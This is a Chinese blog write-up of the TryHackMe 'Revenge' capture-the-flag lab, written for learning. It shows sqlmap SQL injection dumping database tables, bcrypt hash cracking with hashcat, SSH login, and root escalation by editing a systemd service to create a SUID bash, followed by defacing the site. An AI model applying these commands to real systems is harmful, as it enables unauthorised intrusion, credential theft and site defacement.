TryHackMe-Revenge

已于 2023-01-15 14:12:34 修改
阅读量375 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: sql注入 sqlmap linux web安全 权限提升
于 2023-01-11 00:47:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128638419
版权

Revenge

可能涉及的人,

我知道是你黑了我的博客。 你的技能给我留下了深刻的印象。 你有点马虎
并留下了一点足迹,所以我能够找到你。 但是,谢谢你接受我的提议。
我已经对网站进行了一些初步的枚举,因为我知道*一些*关于黑客的事情,但还不够。
出于这个原因,我将让你做自己的枚举和检查。

我要你做的很简单。 闯入运行网站的服务器并污损首页。
我不在乎你怎么做,只要做就行了。 但请记住…不要关闭网站! 我们不想造成无法弥补的损害。

完成工作后,您将获得剩余的付款。 我们商定了5 000美元。
一半在前面,一半在你完成后。

祝你好运

比利

┌──(root🐦kali)-[/home/sugobet]
└─# nmap -sS 10.10.103.200
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-10 20:19 CST
Nmap scan report for 10.10.103.200
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

进入web查看,发现一处可能存在sqli, poc:

http://10.10.103.200/products/1+1

数字型注入,成功返回另一个存在的页面

上sqlmap,省时省力

sqlmap -u 'http://10.10.103.200/products/1' --dbs

[20:29:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.12
[20:29:19] [INFO] fetching database names
available databases [5]:
[*] duckyinc
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

查duckyinc所有表:

sqlmap -u 'http://10.10.103.200/products/1' --dbms=mysql -D duckyinc --tables

Database: duckyinc
[3 tables]
+-------------+
| system_user |
| user        |
| product     |
+-------------+

爆列并且转储数据:

sqlmap -u 'http://10.10.103.200/products/1' --dbms=mysql -D duckyinc -T user -C credit_card --dump

这样将能够获得第一个flag,至于该表的数据,我们暂且放下,因为我们有另一个更值得看的表system_user

这表名一听就跟目标系统用户会有关系

sqlmap -u 'http://10.10.103.200/products/1' --dbms=mysql -D duckyinc -T system_user -C username,_password --dump

Database: duckyinc
Table: system_user
[3 entries]
+--------------+--------------------------------------------------------------+
| username     | _password                                                    |
+--------------+--------------------------------------------------------------+
| server-admin | $2a$08$GPh7KZcK2kNIQEm5byBj1umCQ79xP.zQe19hPoG/w2GoebUtPfT8a |
| kmotley      | $2a$12$LEENY/LWOfyxyCBUlfX8Mu8viV9mGUse97L8x.4L66e9xwzzHfsQa |
| dhughes      | $2a$12$22xS/uDxuIsPqrRcxtVmi.GR2/xh0xITGdHuubRF4Iilg5ENAFlcK |
+--------------+--------------------------------------------------------------+

数据存储在:

/root/.local/share/sqlmap/output/10.10.103.200/dump/duckyinc/system_user.csv

使用haiti-hash可以帮助我们快速识别hash类型,还能告诉我们hashcat和john的类型值:

┌──(root🐦kali)-[/home/sugobet]
└─# haiti '$2a$08$GPh7KZcK2kNIQEm5byBj1umCQ79xP.zQe19hPoG/w2GoebUtPfT8a'
bcrypt [HC: 3200] [JtR: bcrypt]
Blowfish(OpenBSD) [HC: 3200] [JtR: bcrypt]
Woltlab Burning Board 4.x

hashcat 的hash-mode值是:3200

清洗数据,提取hash:

cut -d ":" -f2 /root/.local/share/sqlmap/output/10.10.103.200/dump/duckyinc/system_user.csv > ./test1.txt

爆破:

hashcat -a 0 -m 3200 ./test1.txt /usr/share/wordlists/rockyou.txt

$2a$08$GPh7KZcK2kNIQEm5byBj1umCQ79xP.zQe19hPoG/w2GoebUtPfT8a:in*****ha

只爆出了server-admin的密码,但那也足够了,现在登录ssh

┌──(root🐦kali)-[/home/sugobet]
└─# ssh server-admin@10.10.103.200

成功

server-admin@duckyinc:~$ ls -la
total 44
drwxr-xr-x 5 server-admin server-admin 4096 Aug 12  2020 .
drwxr-xr-x 3 root         root         4096 Aug 10  2020 ..
lrwxrwxrwx 1 root         root            9 Aug 10  2020 .bash_history -> /dev/null
-rw-r--r-- 1 server-admin server-admin  220 Aug 10  2020 .bash_logout
-rw-r--r-- 1 server-admin server-admin 3771 Aug 10  2020 .bashrc
drwx------ 2 server-admin server-admin 4096 Aug 10  2020 .cache
-rw-r----- 1 server-admin server-admin   18 Aug 10  2020 flag2.txt
drwx------ 3 server-admin server-admin 4096 Aug 10  2020 .gnupg
-rw------- 1 root         root           31 Aug 10  2020 .lesshst
drwxr-xr-x 3 server-admin server-admin 4096 Aug 10  2020 .local
-rw-r--r-- 1 server-admin server-admin  807 Aug 10  2020 .profile
-rw-r--r-- 1 server-admin server-admin    0 Aug 10  2020 .sudo_as_admin_successful
-rw------- 1 server-admin server-admin 2933 Aug 12  2020 .viminfo
server-admin@duckyinc:~$ cat ./flag2.txt

查看sudo -l:

Matching Defaults entries for server-admin on duckyinc:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User server-admin may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service,
        /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit
        /etc/systemd/system/duckyinc.service

有个sudoedit,直接使用:

sudoedit /etc/systemd/system/duckyinc.service

是nano

编辑该文件:

[Unit]
Description=Gunicorn instance to serve DuckyInc Webapp
After=network.target

[Service]
User=root
Group=root
WorkingDirectory=/var/www/duckyinc
ExecStart=/bin/bash /tmp/hack.sh
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s TERM $MAINPID

[Install]
WantedBy=multi-user.target

创建文件/tmp/hack.sh:

#!/bin/bash

cp /bin/bash /tmp/bash
chmod +s /tmp/bash

重载配置并重启服务

server-admin@duckyinc:~$ sudo /bin/systemctl daemon-reload
server-admin@duckyinc:~$ sudo /bin/systemctl restart duckyinc.service

/tmp/bash

server-admin@duckyinc:~$ /tmp/bash -p
bash-4.4# whoami
root

但是/root下并没有flag,即便使用find也找不到

查看提示:任务目标

我要你做的很简单。 闯入运行网站的服务器并污损首页。

将duckyinc.service文件的group和user恢复原样

然后修改/var/www/duckyinc/templates/index.html

flag就会出现在/root

hack

顺便挂了个装x黑页,哈哈哈,安慰安慰自己

Sugobet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Quatros-Revenge
05-13
Quatros-Revenge 从头开始用Javascript构建的太空射击游戏,没有任何库。 享受!
靶机渗透练习14-hackme2
hirak0的博客
04-15 987
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-2,618/ Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think ou
TryHackMe学习笔记-The Cod Caper
网安星空
12-17 1348
TryHackMe靶场,联系SQL注入、命令执行等常见漏洞和基本的缓冲区溢出提权
渗透测试实战——hackme:1靶机
LRcaho的博客
04-24 3799
靶机地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.28.137 测试机系统:kali、win10 测试机IP:192.168.28.128 目录 一、信息收集 1.主机发现 2.端口扫描 3.服务扫描 4.目录扫描 5.访问目录扫描出的网站 二、漏洞探测 1.查看是否存在sql注入 2.sql注入 3.登录superadmin 三、getshell 1.上传一句话木
Hackme靶机-渗透学习
weixin_47695901的博客
06-04 75
Hackme靶机-渗透学习 识别所存在的用户 cat /etc/passwd | grep /bin/bash 提权
hackme-1靶机渗透详解
大熊
06-12 345
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
FTP-Revenge.rar_Same Same
09-23
Same as the name, use for Ftp revenge
藏经阁-Revenge of the maths mob Why l.pdf
08-26
藏经阁-Revenge of the maths mob Why l.pdf
chickeneo-voxel-revenge:主机无法播放,请检查DEVELOP
04-06
预览: : 关于一款基于treeJS的未完成的旧游戏,可追溯到2016年(旧名称: Block Dead )。 动作-roguelite-矩阵-x-鸡开始npm i && gulp 运行gulp gulp:dist到minifi文件和东西
Endermans-Revenge:一个报告错误并为 Enderman's Revenge Modpack 提供建议的地方
06-26
Endermans-复仇 Enderman's Revenge 可以从 Feed The Beast 启动器下载,第三方包代码为“ER”。 这是一个报告错误并为 Enderman's Revenge Modpack 提供建议的地方。
TryHackMe-Red Team Capstone Challenge (红队挑战)【真实红队模拟】
M1n9K1n9的博客
05-21 4078
网络安全咨询公司TryHackMe已与Trimento政府接洽,要求对他们的储备银行(TheReserve)进行红队交战。Trimento是一个位于太平洋的岛国。虽然它们的规模可能很小,但由于外国投资,它们绝不是不富裕的。公司 - Trimento储备银行允许外国投资,因此他们有一个部门负责该国的企业银行客户。银行 - Trimento储备银行负责该国的核心银行系统,该系统与世界各地的其他银行相连。logo:Trimento政府表示,评估将涵盖整个储备银行,包括其周边和内部网络。
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6407
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
tryhackme-2020圣诞挑战-day10
qq_43200143的博客
12-11 233
SMB (Server Message Block) - Natively supported by Windows and not Linux NFS (Network File System) - Natively supported by Linux and not Windows Samba windows和Linux都支持,而且是加密传输 枚举,利用enum4linux -U进行用户探测 ,发现三个用户 -S 选项获取分享列表,有四个 提示说有
linux设置挂载指定的usb,自动挂载
A-Itfuture的博客
05-07 456
使用udev规则可以提供更灵活的控制,例如,您可以在脚本中添加额外的挂载选项或条件。在Linux系统中,如果您只想让系统挂载特定的USB设备,而忽略其他的USB设备,可以通过创建自定义的。另外,如果您想要挂载特定的USB设备,您需要在udev规则中添加挂载命令,或者在。创建一个udev规则文件,当指定的USB设备连接时,自动执行挂载脚本。首先,您需要确定您想要挂载的USB设备的属性,如供应商ID(命令列出所有已连接的USB设备,并找到您想要指定的设备。找到您的USB设备的条目,并复制其UUID。
获取Java 虚拟机进程ID(java应用进程Id的方法) Linux & windows
weixin_44131922的博客
04-30 507
这个命令会列出所有包含"java"的进程信息。从中你可以找到你的Java应用对应的进程行,第一列就是进程ID(PID)。这个命令会列出所有包含"java"的进程信息。在输出的信息中,你可以找到Java进程及其PID。替换为你的Java主类名或jar文件名的部分匹配字符串,pgrep会直接返回对应的进程ID。如果你需要在Java程序内部获取其自身的进程ID,可以使用。这段代码会打印出当前运行Java程序的进程ID。
Linux实操之常用指令详解
最新发布
weixin_73355042的博客
05-07 788
Linux 系统是一个多用户多任务的操作系统,任何一个要使用系统资源的用户,都必须首先向系统管理员申请一个账号,然后以这个账号的身份进入系统在 linux 中的每个用户必须属于一个组,不能独立于组外。在 linux 中每个文件有所有者、所在组、其它组的概念。所有者所在组其它组改变用户所在的组文件/目录 所有者一般为文件的创建者,谁创建了该文件,就自然的成为该文件的所有者。查看文件的所有者指令:ls –ahl修改文件所有者指令:chown 用户名 文件名应用案例。
Linux】开始认识软硬链接
JLX_1的博客
04-29 3286
本文通过对文件系统的总结,讲解了Linux中的软硬链接
Linux cmake 初窥【2】
驱动人生
05-07 238
顶层脚本 compile.sh 负责执行 cmake 操作,顶层的 CMakeLists.txt 很关键,指定了源文件路径,其中每个文件夹中都放置了一个CMakeLists.txt 文件,语法要求,否者会报错。func 中的函数就是 Func_Test();和 Func2_Test();基于 cmake 指定源文件目录可以是多个文件夹,多层目录。基于上一篇的基础上,再次升级。顶层 CMakeLists.txt。
给我生成有name genre type episodes rating members description picture 几个字段的动漫数据
05-24
好的,以下是一组动漫数据: ``` Name: Attack on Titan Genre: Action, Drama, Fantasy, Horror, Mystery, Post-Apocalyptic, Thriller Type: TV Series Episodes: 75 Rating: 8.5/10 Members: 2,590,000 Description: Several hundred years ago, humans were nearly exterminated by Titans. Titans are typically several stories tall, seem to have no intelligence, devour human beings and, worst of all, seem to do it for the pleasure rather than as a food source. A small percentage of humanity survived by walling themselves in a city protected by extremely high walls, even taller than the biggest Titans. Flash forward to the present and the city has not seen a Titan in over 100 years. Teenage boy Eren and his foster sister Mikasa witness something horrific as the city walls are destroyed by a Colossal Titan that appears out of thin air. As the smaller Titans flood the city, the two kids watch in horror as their mother is eaten alive. Eren vows that he will murder every single Titan and take revenge for all of mankind. Picture: <insert image link> ``` 希望这能帮到你!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值